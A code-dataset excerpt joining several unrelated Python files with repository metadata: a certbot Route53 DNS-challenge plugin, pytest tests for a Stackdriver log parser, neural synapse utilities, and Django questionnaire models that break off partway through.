super(Authenticator, self).__init__(*args, **kwargs)
self.r53 = boto3.client("route53")
self._resource_records = collections.defaultdict(list) # type: DefaultDict[str, List[Dict[str, str]]]
def more_info(self): # pylint: disable=missing-docstring,no-self-use
return "Solve a DNS01 challenge using AWS Route53"
def _setup_credentials(self):
pass
def _perform(self, domain, validation_domain_name, validation): # pylint: disable=missing-docstring
pass
def perform(self, achalls):
self._attempt_cleanup = True
try:
change_ids = [
self._change_txt_record("UPSERT",
achall.validation_domain_name(achall.domain),
achall.validation(achall.account_key))
for achall in achalls
]
for change_id in change_ids:
self._wait_for_change(change_id)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during perform: %s', e, exc_info=True)
raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
return [achall.response(achall.account_key) for achall in achalls]
def _cleanup(self, domain, validation_domain_name, validation):
try:
self._change_txt_record("DELETE", validation_domain_name, validation)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
def _find_zone_id_for_domain(self, domain):
"""Find the zone id responsible a given FQDN.
That is, the id for the zone whose name is the longest parent of the
domain.
"""
paginator = self.r53.get_paginator("list_hosted_zones")
zones = []
target_labels = domain.rstrip(".").split(".")
for page in paginator.paginate():
for zone in page["HostedZones"]:
if zone["Config"]["PrivateZone"]:
continue
candidate_labels = zone["Name"].rstrip(".").split(".")
if candidate_labels == target_labels[-len(candidate_labels):]:
zones.append((zone["Name"], zone["Id"]))
if not zones:
raise errors.PluginError(
"Unable to find a Route53 hosted zone for {0}".format(domain)
)
# Order the zones that are suffixes for our desired to domain by
# length, this puts them in an order like:
# ["foo.bar.baz.com", "bar.baz.com", "baz.com", "com"]
# And then we choose the first one, which will be the most specific.
zones.sort(key=lambda z: len(z[0]), reverse=True)
return zones[0][1]
def _change_txt_record(self, action, validation_domain_name, validation):
zone_id = self._find_zone_id_for_domain(validation_domain_name)
rrecords = self._resource_records[validation_domain_name]
challenge = {"Value": '"{0}"'.format(validation)}
if action == "DELETE":
# Remove the record being deleted from the list of tracked records
rrecords.remove(challenge)
if rrecords:
# Need to update instead, as we're not deleting the rrset
action = "UPSERT"
else:
# Create a new list containing the record to use with DELETE
rrecords = [challenge]
else:
rrecords.append(challenge)
response = self.r53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
"Comment": "certbot-dns-route53 certificate validation " + action,
"Changes": [
{
"Action": action,
"ResourceRecordSet": {
"Name": validation_domain_name,
"Type": "TXT",
"TTL": self.ttl,
"ResourceRecords": rrecords,
}
}
]
}
)
return response["ChangeInfo"]["Id"]
def _wait_for_change(self, change_id):
"""Wait for a change to be propagated to all Route53 DNS servers.
https://docs.aws.amazon.com/Route53/latest/APIReference/API_GetChange.html
"""
for unused_n in range(0, 120):
response = self.r53.get_change(Id=change_id)
if response["ChangeInfo"]["Status"] == "INSYNC":
return
time.sleep(5)
raise errors.PluginError(
"Timed out waiting for Route53 change. Current status: %s" %
response["ChangeInfo"]["Status"])
| 39.217105 | 146 | 0.610636 | import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict
logger = logging.getLogger(__name__)
INSTRUCTIONS = (
"To use certbot-dns-route53, configure credentials as described at "
"https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials "
"and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
"DNS).")
ttl = 10
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
self.r53 = boto3.client("route53")
self._resource_records = collections.defaultdict(list)
def more_info(self):
return "Solve a DNS01 challenge using AWS Route53"
def _setup_credentials(self):
pass
def _perform(self, domain, validation_domain_name, validation):
pass
def perform(self, achalls):
self._attempt_cleanup = True
try:
change_ids = [
self._change_txt_record("UPSERT",
achall.validation_domain_name(achall.domain),
achall.validation(achall.account_key))
for achall in achalls
]
for change_id in change_ids:
self._wait_for_change(change_id)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during perform: %s', e, exc_info=True)
raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
return [achall.response(achall.account_key) for achall in achalls]
def _cleanup(self, domain, validation_domain_name, validation):
try:
self._change_txt_record("DELETE", validation_domain_name, validation)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
def _find_zone_id_for_domain(self, domain):
paginator = self.r53.get_paginator("list_hosted_zones")
zones = []
target_labels = domain.rstrip(".").split(".")
for page in paginator.paginate():
for zone in page["HostedZones"]:
if zone["Config"]["PrivateZone"]:
continue
candidate_labels = zone["Name"].rstrip(".").split(".")
if candidate_labels == target_labels[-len(candidate_labels):]:
zones.append((zone["Name"], zone["Id"]))
if not zones:
raise errors.PluginError(
"Unable to find a Route53 hosted zone for {0}".format(domain)
)
zones.sort(key=lambda z: len(z[0]), reverse=True)
return zones[0][1]
def _change_txt_record(self, action, validation_domain_name, validation):
zone_id = self._find_zone_id_for_domain(validation_domain_name)
rrecords = self._resource_records[validation_domain_name]
challenge = {"Value": '"{0}"'.format(validation)}
if action == "DELETE":
rrecords.remove(challenge)
if rrecords:
action = "UPSERT"
else:
# Create a new list containing the record to use with DELETE
rrecords = [challenge]
else:
rrecords.append(challenge)
response = self.r53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
"Comment": "certbot-dns-route53 certificate validation " + action,
"Changes": [
{
"Action": action,
"ResourceRecordSet": {
"Name": validation_domain_name,
"Type": "TXT",
"TTL": self.ttl,
"ResourceRecords": rrecords,
}
}
]
}
)
return response["ChangeInfo"]["Id"]
def _wait_for_change(self, change_id):
for unused_n in range(0, 120):
response = self.r53.get_change(Id=change_id)
if response["ChangeInfo"]["Status"] == "INSYNC":
return
time.sleep(5)
raise errors.PluginError(
"Timed out waiting for Route53 change. Current status: %s" %
response["ChangeInfo"]["Status"])
| true | true |
f7193608cbcf5a355487e2c77d44dfda695bddce | 5,728 | py | Python | tests/test_stackdriver_parser.py | cleardataeng/forseti-policy-enforcer | 11eca7e7012759be2730297ef362708695885da7 | [
"Apache-2.0"
] | 11 | 2019-04-12T21:23:49.000Z | 2020-09-02T11:16:49.000Z | tests/test_stackdriver_parser.py | forseti-security/real-time-enforcer | 11eca7e7012759be2730297ef362708695885da7 | [
"Apache-2.0"
] | 18 | 2019-04-09T16:23:03.000Z | 2021-04-26T14:25:17.000Z | tests/test_stackdriver_parser.py | forseti-security/forseti-policy-enforcer | 11eca7e7012759be2730297ef362708695885da7 | [
"Apache-2.0"
] | 11 | 2019-05-08T09:08:08.000Z | 2021-04-26T19:23:24.000Z | # Copyright 2019 The Forseti Real Time Enforcer Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import pytest
from app.parsers.stackdriver import StackdriverParser
from google.oauth2.credentials import Credentials
from rpe.resources.gcp import GoogleAPIResource
test_google_args = {
'credentials': Credentials(token='bogus'),
}
def get_test_data(filename):
'''Load json data from the tests dir'''
p = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'data',
filename,
)
with open(p) as f:
return json.load(f)
# parameters for testing logs that should return a single asset
test_single_asset_log_params = [
# filename, expected_resource_type, expected_operation_type, expected_resource_name
("app-engine-debug.json", "appengine.googleapis.com/Instance", "write", "aef-default-test-instance"),
("bq-ds-set-iam-policy.json", "bigquery.googleapis.com/Dataset", "write", "wooo"),
("bigtable-set-iam-policy.json", "bigtableadmin.googleapis.com/Instance", "write", "example-instance"),
("pubsub-subscription-set-iam-policy.json", "pubsub.googleapis.com/Subscription", "write", "test-subscription"),
("pubsub-topic-set-iam-policy.json", "pubsub.googleapis.com/Topic", "write", "test-topic"),
# CloudSQL logs are inconsistent. See https://issuetracker.google.com/issues/137629452
("cloudsql-resource.labels.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.body.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.resource.instanceName.instanceId.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudfunctions-set-iam-policy.json", "cloudfunctions.googleapis.com/CloudFunction", "write", "example_function"),
("compute-subnetworks-enable-flow-logs.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-subnetworks-set-private-ip-google-access.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-firewalls-enable-logs-policy.json", "compute.googleapis.com/Firewall", "write", "test-firewall"),
("dataproc_createcluster.json", "dataproc.googleapis.com/Cluster", "write", "test-dataproc-cluster"),
("datafusion-create-instance.json", "datafusion.googleapis.com/Instance", "create", "test-instance"),
("datafusion-update-instance.json", "datafusion.googleapis.com/Instance", "write", "test-instance"),
("gke-cluster-update.json", "container.googleapis.com/Cluster", "write", "example-cluster"),
("gke-nodepool-set.json", "container.googleapis.com/NodePool", "write", "example-pool"),
("servicemanagement-enable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubeadsreach.googleapis.com"),
("servicemanagement-disable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("servicemanagement-activate-service.json", "serviceusage.googleapis.com/Service", "write", "calendar-json.googleapis.com"),
("servicemanagement-deactivate-service.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("serviceusage-enable.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("serviceusage-disable.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("dataflow-job-step.json", "dataflow.googleapis.com/Job", "write", "job-id"),
("memorystore-redis.json", "redis.googleapis.com/Instance", "write", "test-instance"),
]
test_log_resource_count_params = [
("serviceusage-batchenable.json", 3),
("compute-hardened-images.json", 3),
]
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_single_asset_log_messages(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == 1
asset_info = assets[0]
assert asset_info['resource_type'] == expected_resource_type
#assert asset_info['operation_type'] == expected_operation_type
assert asset_info['name'] == expected_resource_name
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_rpe_from_stackdriver_data(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
asset_info = assets[0]
GoogleAPIResource.from_resource_data(client_kwargs=test_google_args, **asset_info)
@pytest.mark.parametrize(
"filename,expected_resource_count",
test_log_resource_count_params
)
def test_log_resource_count(filename, expected_resource_count):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == expected_resource_count
asset_info = assets[0]
| 49.37931 | 138 | 0.752793 |
import json
import os
import pytest
from app.parsers.stackdriver import StackdriverParser
from google.oauth2.credentials import Credentials
from rpe.resources.gcp import GoogleAPIResource
test_google_args = {
'credentials': Credentials(token='bogus'),
}
def get_test_data(filename):
p = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'data',
filename,
)
with open(p) as f:
return json.load(f)
test_single_asset_log_params = [
("app-engine-debug.json", "appengine.googleapis.com/Instance", "write", "aef-default-test-instance"),
("bq-ds-set-iam-policy.json", "bigquery.googleapis.com/Dataset", "write", "wooo"),
("bigtable-set-iam-policy.json", "bigtableadmin.googleapis.com/Instance", "write", "example-instance"),
("pubsub-subscription-set-iam-policy.json", "pubsub.googleapis.com/Subscription", "write", "test-subscription"),
("pubsub-topic-set-iam-policy.json", "pubsub.googleapis.com/Topic", "write", "test-topic"),
("cloudsql-resource.labels.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.body.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudsql-protoPayload.request.resource.instanceName.instanceId.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
("cloudfunctions-set-iam-policy.json", "cloudfunctions.googleapis.com/CloudFunction", "write", "example_function"),
("compute-subnetworks-enable-flow-logs.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-subnetworks-set-private-ip-google-access.json", "compute.googleapis.com/Subnetwork", "write", "example"),
("compute-firewalls-enable-logs-policy.json", "compute.googleapis.com/Firewall", "write", "test-firewall"),
("dataproc_createcluster.json", "dataproc.googleapis.com/Cluster", "write", "test-dataproc-cluster"),
("datafusion-create-instance.json", "datafusion.googleapis.com/Instance", "create", "test-instance"),
("datafusion-update-instance.json", "datafusion.googleapis.com/Instance", "write", "test-instance"),
("gke-cluster-update.json", "container.googleapis.com/Cluster", "write", "example-cluster"),
("gke-nodepool-set.json", "container.googleapis.com/NodePool", "write", "example-pool"),
("servicemanagement-enable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubeadsreach.googleapis.com"),
("servicemanagement-disable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("servicemanagement-activate-service.json", "serviceusage.googleapis.com/Service", "write", "calendar-json.googleapis.com"),
("servicemanagement-deactivate-service.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("serviceusage-enable.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
("serviceusage-disable.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
("dataflow-job-step.json", "dataflow.googleapis.com/Job", "write", "job-id"),
("memorystore-redis.json", "redis.googleapis.com/Instance", "write", "test-instance"),
]
test_log_resource_count_params = [
("serviceusage-batchenable.json", 3),
("compute-hardened-images.json", 3),
]
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_single_asset_log_messages(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == 1
asset_info = assets[0]
assert asset_info['resource_type'] == expected_resource_type
assert asset_info['name'] == expected_resource_name
@pytest.mark.parametrize(
"filename,expected_resource_type,expected_operation_type,expected_resource_name",
test_single_asset_log_params
)
def test_rpe_from_stackdriver_data(filename, expected_resource_type, expected_operation_type, expected_resource_name):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
asset_info = assets[0]
GoogleAPIResource.from_resource_data(client_kwargs=test_google_args, **asset_info)
@pytest.mark.parametrize(
"filename,expected_resource_count",
test_log_resource_count_params
)
def test_log_resource_count(filename, expected_resource_count):
log_message = get_test_data(filename)
assets = StackdriverParser._extract_asset_info(log_message)
assert len(assets) == expected_resource_count
asset_info = assets[0]
| true | true |
f7193619bac808f3d98da51fdcf5aec8a4d3189e | 7,952 | py | Python | blur/synapse_util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | 7 | 2021-06-15T05:54:29.000Z | 2022-02-21T06:57:06.000Z | blur/synapse_util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | null | null | null | blur/synapse_util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | 5 | 2021-11-25T07:40:17.000Z | 2022-03-22T11:13:39.000Z | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for synapse handling."""
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
TensorShape = tf.TensorShape
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
shape: TensorShape
in_neurons: int
out_neurons: int
class UpdateType(enum.Enum):
FORWARD = 1
BACKWARD = 2
BOTH = 3
NONE = 4
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]
# A callable that takes a sequence of layers and SynapseInitializer and creates
# appropriately shaped list of Synapses.
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
return (tf.random.uniform(shape, seed=seed) - 0.5) * 2
def random_initializer(start_seed=0, scale_by_channels=False,
scale=1, bias=0, random_fn=random_uniform_symmetric):
"""Returns initializer that generates random sequence."""
seed = [hash(str(start_seed))]
def impl(params):
if len(params.shape) >= 3:
# shape: species x (in+out) x (in+out) x states
num_channels = int(params.shape[-2])
seed[0] += 1
v = random_fn(params.shape, seed[0])
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def _random_uniform_fn(start_seed):
rng = np.random.RandomState(start_seed)
return lambda shape: tf.constant(rng.uniform( # pylint: disable=g-long-lambda
low=-1, high=1, size=shape), dtype=np.float32)
def fixed_random_initializer(start_seed=0,
scale_by_channels=False,
scale=1,
bias=0,
random_fn=None):
"""Returns an initializer that generates random (but fixed) sequence.
The resulting tensors are backed by a constant so they produce the same
value across all calls.
This initializer uses its own random state that is independent of default
random sequence.
Args:
start_seed: initial seed passed to np.random.RandomStates
scale_by_channels: whether to scale by number of channels.
scale: target scale (default: 1)
bias: mean of the resulting distribution.
random_fn: random generator if none will use use _random_uniform_fn
Returns:
callable that accepts shape and returns tensorflow constant tensor.
"""
if random_fn is None:
random_fn = _random_uniform_fn(start_seed)
def impl(params):
if len(params.shape) >= 3:
# shape: species x (in+out) x (in+out) x states
num_channels = int(params.shape[-2])
v = random_fn(shape=params.shape)
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def create_synapse_init_fns(
layers,
initializer):
"""Generates network synapse initializers.
Arguments:
layers: Sequence of network layers (used for shape calculation).
initializer: SynapseInitializer used to initialize synapse tensors.
Returns:
A list of functions that produce synapse tensors for all layers upon
execution.
"""
synapse_init_fns = []
for pre, post in zip(layers, layers[1:]):
# shape: population_dims, batch_size, in_channels, neuron_state
pop_dims = pre.shape[:-3]
# -2: is the number of channels
num_inputs = pre.shape[-2] + post.shape[-2] + 1
# -1: is the number of states in a single neuron.
synapse_shape = (*pop_dims, num_inputs, num_inputs, pre.shape[-1])
params = SynapseInitializerParams(
shape=synapse_shape,
in_neurons=pre.shape[-2],
out_neurons=post.shape[-2])
synapse_init_fns.append(ft.partial(initializer, params))
return synapse_init_fns
def create_synapses(layers,
initializer):
"""Generates arbitrary form synapses.
Arguments:
layers: Sequence of network layers (used for shape calculation).
initializer: SynapseInitializer used to initialize synapse tensors.
Returns:
A list of created synapse tensors for all layers.
"""
return [init_fn() for init_fn in create_synapse_init_fns(layers, initializer)]
def transpose_synapse(synapse, env):
num_batch_dims = len(synapse.shape[:-3])
perm = [
*range(num_batch_dims), num_batch_dims + 1, num_batch_dims,
num_batch_dims + 2
]
return env.transpose(synapse, perm)
def synapse_submatrix(synapse,
in_channels,
update_type,
include_bias = True):
"""Returns a submatrix of a synapse matrix given the update type."""
bias = 1 if include_bias else 0
if update_type == UpdateType.FORWARD:
return synapse[Ellipsis, :(in_channels + bias), (in_channels + bias):, :]
if update_type == UpdateType.BACKWARD:
return synapse[Ellipsis, (in_channels + 1):, :(in_channels + bias), :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
env):
"""Combines forward and backward synapses into a single matrix."""
batch_dims = in_out_synapse.shape[:-3]
out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
synapse = env.concat([
env.concat([
env.zeros((*batch_dims, out_channels, out_channels, num_states)),
in_out_synapse
], axis=-2),
env.concat([
out_in_synapse,
env.zeros((*batch_dims, in_channels, in_channels, num_states))
], axis=-2)
], axis=-3)
return synapse
def sync_all_synapses(synapses, layers, env):
"""Sync synapses across all layers.
For each synapse, syncs its first state forward synapse with backward synapse
and copies it arocess all the states.
Args:
synapses: list of synapses in the network.
layers: list of layers in the network.
env: Environment
Returns:
Synchronized synapses.
"""
for i in range(len(synapses)):
synapses[i] = sync_in_and_out_synapse(synapses[i], layers[i].shape[-2], env)
return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
"""Copies forward synapse to backward one."""
in_out_synapse = synapse_submatrix(
synapse,
in_channels=in_channels,
update_type=UpdateType.FORWARD,
include_bias=True)
return combine_in_out_synapses(
in_out_synapse,
transpose_synapse(in_out_synapse, env),
env)
def sync_states_synapse(synapse, env, num_states=None):
"""Sync synapse's first state across all the other states."""
if num_states is None:
num_states = synapse.shape[-1]
return env.stack(num_states*[synapse[Ellipsis, 0]], axis=-1)
def normalize_synapses(synapses,
rescale_to,
env,
axis = -3):
"""Normalizes synapses across a particular axis (across input by def.)."""
# Default value axis=-3 corresponds to normalizing across the input neuron
# dimension.
squared = env.sum(synapses ** 2, axis=axis, keepdims=True)
synapses /= env.sqrt(squared + 1e-9)
if rescale_to is not None:
synapses *= rescale_to
return synapses
| 31.43083 | 80 | 0.689764 |
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
TensorShape = tf.TensorShape
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
shape: TensorShape
in_neurons: int
out_neurons: int
class UpdateType(enum.Enum):
FORWARD = 1
BACKWARD = 2
BOTH = 3
NONE = 4
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
return (tf.random.uniform(shape, seed=seed) - 0.5) * 2
def random_initializer(start_seed=0, scale_by_channels=False,
scale=1, bias=0, random_fn=random_uniform_symmetric):
seed = [hash(str(start_seed))]
def impl(params):
if len(params.shape) >= 3:
num_channels = int(params.shape[-2])
seed[0] += 1
v = random_fn(params.shape, seed[0])
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def _random_uniform_fn(start_seed):
rng = np.random.RandomState(start_seed)
return lambda shape: tf.constant(rng.uniform(
low=-1, high=1, size=shape), dtype=np.float32)
def fixed_random_initializer(start_seed=0,
scale_by_channels=False,
scale=1,
bias=0,
random_fn=None):
if random_fn is None:
random_fn = _random_uniform_fn(start_seed)
def impl(params):
if len(params.shape) >= 3:
num_channels = int(params.shape[-2])
v = random_fn(shape=params.shape)
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def create_synapse_init_fns(
layers,
initializer):
synapse_init_fns = []
for pre, post in zip(layers, layers[1:]):
pop_dims = pre.shape[:-3]
num_inputs = pre.shape[-2] + post.shape[-2] + 1
synapse_shape = (*pop_dims, num_inputs, num_inputs, pre.shape[-1])
params = SynapseInitializerParams(
shape=synapse_shape,
in_neurons=pre.shape[-2],
out_neurons=post.shape[-2])
synapse_init_fns.append(ft.partial(initializer, params))
return synapse_init_fns
def create_synapses(layers,
initializer):
return [init_fn() for init_fn in create_synapse_init_fns(layers, initializer)]
def transpose_synapse(synapse, env):
num_batch_dims = len(synapse.shape[:-3])
perm = [
*range(num_batch_dims), num_batch_dims + 1, num_batch_dims,
num_batch_dims + 2
]
return env.transpose(synapse, perm)
def synapse_submatrix(synapse,
in_channels,
update_type,
include_bias = True):
bias = 1 if include_bias else 0
if update_type == UpdateType.FORWARD:
return synapse[Ellipsis, :(in_channels + bias), (in_channels + bias):, :]
if update_type == UpdateType.BACKWARD:
return synapse[Ellipsis, (in_channels + 1):, :(in_channels + bias), :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
env):
batch_dims = in_out_synapse.shape[:-3]
out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
synapse = env.concat([
env.concat([
env.zeros((*batch_dims, out_channels, out_channels, num_states)),
in_out_synapse
], axis=-2),
env.concat([
out_in_synapse,
env.zeros((*batch_dims, in_channels, in_channels, num_states))
], axis=-2)
], axis=-3)
return synapse
def sync_all_synapses(synapses, layers, env):
for i in range(len(synapses)):
synapses[i] = sync_in_and_out_synapse(synapses[i], layers[i].shape[-2], env)
return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
in_out_synapse = synapse_submatrix(
synapse,
in_channels=in_channels,
update_type=UpdateType.FORWARD,
include_bias=True)
return combine_in_out_synapses(
in_out_synapse,
transpose_synapse(in_out_synapse, env),
env)
def sync_states_synapse(synapse, env, num_states=None):
if num_states is None:
num_states = synapse.shape[-1]
return env.stack(num_states*[synapse[Ellipsis, 0]], axis=-1)
def normalize_synapses(synapses,
rescale_to,
env,
axis = -3):
squared = env.sum(synapses ** 2, axis=axis, keepdims=True)
synapses /= env.sqrt(squared + 1e-9)
if rescale_to is not None:
synapses *= rescale_to
return synapses
| true | true |
f71936663f2310c9c86574acc5b1c59f865d0108 | 3,113 | py | Python | questionnaire/models.py | cjz25/cquestionnaire | 961c508d463a8d9d50c8485fa65c4a9d3a56e5fa | [
"MIT"
] | null | null | null | questionnaire/models.py | cjz25/cquestionnaire | 961c508d463a8d9d50c8485fa65c4a9d3a56e5fa | [
"MIT"
] | null | null | null | questionnaire/models.py | cjz25/cquestionnaire | 961c508d463a8d9d50c8485fa65c4a9d3a56e5fa | [
"MIT"
] | 1 | 2021-10-15T12:51:01.000Z | 2021-10-15T12:51:01.000Z | from django.db import models
# from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _
# Create your models here.
class Questionnaire(models.Model):
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
# created_by = models.ForeignKey(User, on_delete=models.CASCADE)
updated_dtm = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Question(models.Model):
# short answer, multiple choice, checkboxes
# https://docs.djangoproject.com/en/3.1/ref/models/fields/#enumeration-types
class QuestionType(models.TextChoices):
SHORT_ANSWER = 'SA', _('Short Answer')
MULTIPLE_CHOICE = 'MC', _('Multiple Choice')
CHECKBOXES = 'CB', _('Checkboxes')
questionnaire = models.ForeignKey(
Questionnaire,
on_delete=models.CASCADE,
related_name='questions'
)
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
required = models.BooleanField()
question_type = models.CharField(
max_length=2,
choices=QuestionType.choices,
default=QuestionType.SHORT_ANSWER,
)
visible = models.BooleanField()
def __str__(self):
return f'{self.questionnaire.title} | {self.title}'
class QuestionSequence(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('questionnaire', 'question'),)
class QuestionChoice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
item = models.CharField(max_length=100)
def __str__(self):
return f'{self.question.title} | {self.item}'
class QuestionChoiceSequence(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
questionchoice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('question', 'questionchoice'),)
# response master
class QuestionResponseMaster(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
# response detail
class QuestionResponseDetail(models.Model):
response_master_id = models.ForeignKey(QuestionResponseMaster, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
# response for question types: multiple choice, checkboxes
class QuestionResponseSelection(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
choice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
# response for question type: short answer
class QuestionResponseText(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
text = models.TextField()
| 33.836957 | 92 | 0.73948 | from django.db import models
from django.utils.translation import gettext_lazy as _
class Questionnaire(models.Model):
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
updated_dtm = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Question(models.Model):
nType(models.TextChoices):
SHORT_ANSWER = 'SA', _('Short Answer')
MULTIPLE_CHOICE = 'MC', _('Multiple Choice')
CHECKBOXES = 'CB', _('Checkboxes')
questionnaire = models.ForeignKey(
Questionnaire,
on_delete=models.CASCADE,
related_name='questions'
)
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
required = models.BooleanField()
question_type = models.CharField(
max_length=2,
choices=QuestionType.choices,
default=QuestionType.SHORT_ANSWER,
)
visible = models.BooleanField()
def __str__(self):
return f'{self.questionnaire.title} | {self.title}'
class QuestionSequence(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
